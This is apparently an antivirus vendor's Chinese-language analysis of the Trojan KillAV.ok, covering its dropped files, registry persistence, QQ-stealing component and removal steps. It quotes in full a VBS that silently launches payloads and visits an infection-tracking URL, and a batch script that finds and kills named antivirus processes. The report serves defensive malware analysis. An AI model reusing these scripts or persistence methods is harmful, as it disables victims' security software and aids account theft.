一、 病毒标签:
病毒名称: Trojan.Win32.KillAV.ok
MD5: 5E6D28472E2975EE0DCF92A7A64D906C
文件长度: 72.1 KB (73,864 字节)
公开范围: 完全公开
危害等级: C
加壳类型: UPX+自解压缩包
命名对照:
|
瑞星 |
20.0 |
20.32.42.00 |
2008-02-22 |
Worm.Win32.AvKiller.cz |
4.370 |
二、 病毒描述:
该病毒为http://www.bebecu.com/self/real.html病毒页面下载并执行。释放BAT。VBS等脚本文件破坏杀软及主动防御。释放2.exe盗取QQ帐号。
三、 行为分析:
该压缩包带有自动解压并执行的命令:
Path=%systemroot%\temp\
SavePath
Setup=2.vbs
Silent=1
Overwrite=2
将文件2.bat,2.vbs.2.exe, knlps.exe释放至temp\目录下并执行。
2.Vbs
该VBS内容如下:
set ws=wscript.createobject("wscript.shell")
ws.run "%systemroot%\temp\2.bat",0
wscript.sleep 10000
ws.run "%systemroot%\temp\2.exe",0
Ws.run "IEXPLORE.EXE http://www.kis.ac.cn/realtj.html",0
调用2.bat与2.exe。访问http://www.kis.ac.cn/realtj.html进行REAL网马的肉鸡统计。
2.bat内容如下:
@echo off
knlps.exe -l >PID.txt
set pva=avp.exe
findstr /i %pva% PID.txt >>rav.txt
findstr /i %pva% PID.txt >>rav.txt
findstr /i "RavMon.exe" PID.txt >>rav.txt
findstr /i "RavMonD.exe" PID.txt >>rav.txt
findstr /i "CCenter.exe" PID.txt >>rav.txt
findstr /i "KVMonXP.kxp" PID.txt >>rav.txt
findstr /i "KVxp.kxp" PID.txt >>rav.txt
findstr /i "kvsrvxp.exe" PID.txt >>rav.txt
findstr /i "kvwsc.exe" PID.txt >>rav.txt
findstr /i "KAVStart.exe" PID.txt >>rav.txt
findstr /i "KWatch.exe" PID.txt >>rav.txt
findstr /i "KPFW32.exe" PID.txt >>rav.txt
findstr /i "KPFWSvc.exe" PID.txt >>rav.txt
findstr /i "rfwsrv.exe" PID.txt >>rav.txt
findstr /i "rfwproxy.exe" PID.txt >>rav.txt
findstr /i "rfwmain.exe" PID.txt >>rav.txt
findstr /i "Navapw32.exe" PID.txt >>rav.txt
findstr /i "Navapsvc.exe" PID.txt >>rav.txt
findstr /i "rising.exe" PID.txt >>rav.txt
findstr /i "Symantec.exe" PID.txt >>rav.txt
findstr /i "rtvscan.exe" PID.txt >>rav.txt
findstr /i "ccApp.exe" PID.txt >>rav.txt
findstr /i "VTPRay.exe" PID.txt >>rav.txt
findstr /i "360tray.exe" PID.txt >>rav.txt
for /f "eol=; tokens=1 delims= " %%1 in (rav.txt) do knlps.exe -k %%1
获取以上进程的PID,调用knlps.exe结束其进程。
2.exe为Trojan.Win32.KillAV.ok。
该病毒破坏瑞星,360安全卫士,卡巴等杀软的正常运行。
释放:
C:\WINDOWS\system32\gopen.exe
C:\WINDOWS\system32\winso32.sys
C:\WINDOWS\system32\LCInstall.exe
C:\WINDOWS\system32\msxl32.dll
C:\WINDOWS\system32\IVATE.DLL
C:\WINDOWS\system32\QQHook.dll
增加启动项目:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\dxdiags.exe
注册C:\WINDOWS\system32\msxl32.dll:
HKCR\CLSID\{523C33CB-510E-4857-9801-78F1D892879C}\InprocServer32
类型: REG_SZ
值: C:\WINDOWS\system32\msxl32.dll
该DLL很有趣:
HKEY_CLASSES_ROOT\CLSID\{523C33CB-510E-4857-9801-78F1D892879C} "(Default)"
Type: REG_SZ
Data: WEB反病毒保护
注册服务:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\winso32 "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\system32\winso32.sys
该驱动在XPSP2下会蓝……
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winso32 "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\system32\winso32.sys
还有一个隐蔽的启动项目被主动防御所忽略:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor "AutoRun"
Old type: REG_SZ
New type: REG_SZ
Old data:
New data: C:\WINDOWS\system32\dxdiags.exe
运行CMD的时候会先搜寻其值,通过这样来达到启动病毒。
解决方案:
删除:
C:\WINDOWS\system32\gopen.exe
C:\WINDOWS\system32\winso32.sys
C:\WINDOWS\system32\LCInstall.exe
C:\WINDOWS\system32\msxl32.dll
C:\WINDOWS\system32\IVATE.DLL
C:\WINDOWS\system32\QQHook.dll
修改:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Userinit"
将Old data:
C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\dxdiags.exe
修改为
New data: C:\WINDOWS\system32\userinit.exe,
修改:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor "AutoRun"
将New data: C:\WINDOWS\system32\dxdiags.exe
修改为空值
删除注册表项目:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\winso32
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winso32
HKEY_CLASSES_ROOT\CLSID\{523C33CB-510E-4857-9801-78F1D892879C}
注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。
%Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
%Windir%\ WINDODWS所在目录
%DriveLetter%\ 逻辑驱动器根目录
%ProgramFiles%\ 系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\ 当前用户文档根目录
大面积感染流行,并具有以下条件中的任意一个给网络造成严重压力、开有后门、反制AV技术。
B级
有一定的感染流行面积,或者有鲜明的技术特点值得进一步关注,或为既往A级蠕虫比较成熟的变种
C级
有少量感染流行,或虽然有一定感染流行面积,但是既往B级蠕虫变种。
D级
有极少量感染流行,但有一定潜在威胁。
E级
没有发现感染流行。
